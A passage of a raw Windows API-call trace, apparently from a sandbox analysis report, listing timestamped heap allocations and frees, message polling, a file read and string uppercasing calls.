| out: hHeap=0x2af0000) returned 1 [0102.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0102.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0102.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0102.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0102.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0102.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0102.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0102.191] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.191] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0102.191] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0102.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0102.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0102.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0102.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.192] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0102.192] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cae020 [0102.195] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0102.195] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x4550, lpOverlapped=0x0) returned 1 [0102.196] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0102.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0102.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0102.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.196] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4550) returned 0x2ace888 [0102.196] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cae020 | out: hHeap=0x2af0000) returned 1 [0102.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0102.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0102.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0102.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0102.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.199] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0102.199] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4550) returned 0x2a7a130 [0102.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0102.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.200] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0102.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0102.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4550) returned 0x2ace888 [0102.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0102.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ace888 | out: hHeap=0x2af0000) returned 1 [0102.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0102.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.200] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0102.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0102.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0102.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0102.200] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.200] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0102.201] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0102.201] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0102.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0102.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73068 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4550) returned 0x2ace888 [0102.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73068 | out: hHeap=0x2af0000) returned 1 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73068 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0102.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a715e8 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0102.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0102.201] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9790 [0102.201] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0102.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4550) returned 0x2a7e688 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0102.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0102.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0102.202] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0102.202] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.202] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0102.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0102.203] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0102.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0102.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0102.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0102.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0102.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0102.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0102.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0102.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0102.203] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0102.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0102.203] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0102.203] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0102.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0102.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0102.204] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0102.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0102.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0102.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0102.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0102.204] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0102.204] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0102.204] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0102.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0102.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0102.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0102.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0102.205] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0102.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0102.205] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0102.205] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 